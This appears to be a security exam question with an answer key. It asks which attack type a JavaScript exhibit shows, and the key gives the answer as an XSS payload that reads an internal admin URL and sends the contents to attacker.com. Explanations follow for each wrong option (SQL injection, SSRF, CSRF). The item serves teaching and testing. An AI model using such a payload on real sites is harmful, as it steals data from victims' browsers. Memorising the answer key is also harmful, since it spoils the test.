Refer to the exhibit.
```html <script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://internal.admin.local/sensitive', true); xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {fetch('http://attacker.com/log?data=' + encodeURIComponent(xhr.responseText));
} };
xhr.send(); </script> ```
What type of client-side attack vector is demonstrated in this JavaScript code snippet?
Trap 1: SQL Injection extraction via asynchronous database polling loops
The code utilizes XMLHttpRequest to make HTTP requests to an internal URL, interacting with web applications rather than executing SQL queries. Database polling requires specialized database drivers or direct query syntax, which is absent from this standard HTTP request script.
Trap 2: Server-Side Request Forgery via backend proxy manipulation
Server-side request forgery involves tricking the server into making requests, whereas this script runs entirely inside the client browser. The XMLHttpRequest originates from the victim browser context rather than the backend application server.
Trap 3: Cross-Site Request Forgery payload designed to modify state without…
CSRF typically targets state-changing operations (like POST or PUT requests) where reading the response body is not required. This script performs a GET request and explicitly reads and exfiltrates the response text, which differentiates it from standard CSRF.
- A
SQL Injection extraction via asynchronous database polling loops
Why it fails: The code utilizes XMLHttpRequest to make HTTP requests to an internal URL, interacting with web applications rather than executing SQL queries. Database polling requires specialized database drivers or direct query syntax, which is absent from this standard HTTP request script.
- B
Client-side Cross-Site Scripting exfiltration of internal web resources accessible to the victim browser
The script leverages an active browser session to query an internal URL and exfiltrate the resulting data to an external server. This pattern is typical of XSS payloads designed to exploit the victim trust relationship with internal network services.
- C
Server-Side Request Forgery via backend proxy manipulation
Why it fails: Server-side request forgery involves tricking the server into making requests, whereas this script runs entirely inside the client browser. The XMLHttpRequest originates from the victim browser context rather than the backend application server.
- D
Cross-Site Request Forgery payload designed to modify state without reading responses
Why it fails: CSRF typically targets state-changing operations (like POST or PUT requests) where reading the response body is not required. This script performs a GET request and explicitly reads and exfiltrates the response text, which differentiates it from standard CSRF.